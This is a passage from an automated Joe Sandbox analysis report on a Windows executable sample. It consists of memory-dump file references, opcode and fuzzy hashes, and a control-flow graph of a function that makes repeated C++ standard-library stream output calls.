                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 21d98e567af44ad588a9bdf6abca0de3e3687648226b3f748c40dc7ef371115b
                                                                                                                                                                                                      • Instruction ID: b4e9c6e1c20ba707cf3daec3218217e6efaa7baa28ba8c331bec5e42169e5706
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21d98e567af44ad588a9bdf6abca0de3e3687648226b3f748c40dc7ef371115b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96D1B333C8868DC6E252963750431B8B390BF6E781F19DB36E968B30B5EF297585D780
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 38a985e780e801c264d8b50e19511b22a38496358acf7af5463d4eb73dcec3e5
                                                                                                                                                                                                      • Instruction ID: 542fba43626a60d44b354d5cb71095d80f04a5ef751a06fcda017b57d604b367
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 38a985e780e801c264d8b50e19511b22a38496358acf7af5463d4eb73dcec3e5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3FA1E472D0A24AC9E66B9573624737966507F2E784F188B3ADD0CB36B7DF297094C700
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 2bcd3197e7a94d8f4669cd47af88f788f576cd2a1d22f7ac130a8060a2ffd7e0
                                                                                                                                                                                                      • Instruction ID: 0396db59fbba297f3d1375414763d6ce3532e6d86af58554081182dc5c3280f5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bcd3197e7a94d8f4669cd47af88f788f576cd2a1d22f7ac130a8060a2ffd7e0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BDA19032A18AD4CAE701CF7A90412BCBBB0BF5D349F159329EE4573A79DB396585CB00
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                                                                                                                                                                                                      • Instruction ID: af2529184e08fdeb626e73675db10197a8d96b93f4ab4b127fa4be9292d6d5e2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 512c292fdddac8fadd8bee25fcce6216da02647fedf7223a0dbb6b8c96daeb65
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1651F7A66344B187DE608F2AD8C26BC3791E74AB43FD4847AD659C3FA5C52DC10ADF20
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
                                                                                                                                                                                                      • Instruction ID: d75dbd085c9fd5debd24941e273da4db44dc5554da5360dfcb519ccc51e7c730
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08bc665d7d74957357dfb2865b53844b73cc3dd795c035b4743b64fb389cc0bd
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C141E925E0D359C1E5218523518117A6292BF6FB80F5CE73ADE8E77AA8DF38F481CB00
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
                                                                                                                                                                                                      • Instruction ID: fd63359710b18b7948b77cc56d43b2928a70569dfc93bd4f1b39864deb9a1a99
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d406a45ebeab2dfcb8c903a12aa031135c655f79b932f30f18ed0330c4a30bac
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A5417433B115548BE78CCE2AC8226AD33A2F799704F55C23DDB0AC7399DE359905C744
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 03476e7227802f569826f36016054d3e6064328171a835016549a9e5441fdc82
                                                                                                                                                                                                      • Instruction ID: 9617d64f6e0ea96f1cb28f72f0967e5a56920297541ecf41a6444e998e90f072
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03476e7227802f569826f36016054d3e6064328171a835016549a9e5441fdc82
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D312237764A5687EB488A38E922B7C26D0F749301FC9A53DEE5AC7AC2DB2DD011C300
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: b48a3934f420378518813382a9e99c99cb228befbed985ae5527a6be8af69f63
                                                                                                                                                                                                      • Instruction ID: 505a7b3e33a659f011eac07ca1de2126c66382525ea2068ef6169e16eef569ac
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b48a3934f420378518813382a9e99c99cb228befbed985ae5527a6be8af69f63
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71A00161949C0ED4E6548B40A8660312228FF58B10B50143AD55D820B8DF3CB958C300

                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                      control_flow_graph 1131 7ff68b4b3420-7ff68b4b388a memset call 7ff68b4c7500 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@M@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z call 7ff68b4c7c40 1136 7ff68b4b38ac-7ff68b4b390f call 7ff68b4c7490 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA@XZ ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ call 7ff68b4ca930 1131->1136 1137 7ff68b4b388c-7ff68b4b38ab ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z 1131->1137 1137->1136
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.VCRUNTIME140 ref: 00007FF68B4B3450
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7500: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF68B4C753B
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7500: ??0?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140 ref: 00007FF68B4C755A
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7500: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ.MSVCP140 ref: 00007FF68B4C758C
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7500: ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAAXXZ.MSVCP140 ref: 00007FF68B4C75A7
                                                                                                                                                                                                        • Part of subcall function 00007FF68B4C7500: ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z.MSVCP140 ref: 00007FF68B4C75F3
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B346F
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B347F
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3491
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B34A1
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B34B3
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B34C3
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B34D5
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B34E5
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF68B4B34F6
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3506
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF68B4B3517
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3527
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF68B4B3538
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3548
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B355A
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B356A
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF68B4B357B
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B358B
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B359D
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B35AD
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@H@Z.MSVCP140 ref: 00007FF68B4B35BE
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B35CE
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B35E0
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B35F0
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3602
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3612
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3624
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3634
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3646
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3656
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B3668
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B3678
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B368A
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B369A
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B36AC
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B36BC
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B36CE
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z.MSVCP140 ref: 00007FF68B4B36DE
                                                                                                                                                                                                      • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_N@Z.MSVCP140 ref: 00007FF68B4B36F0
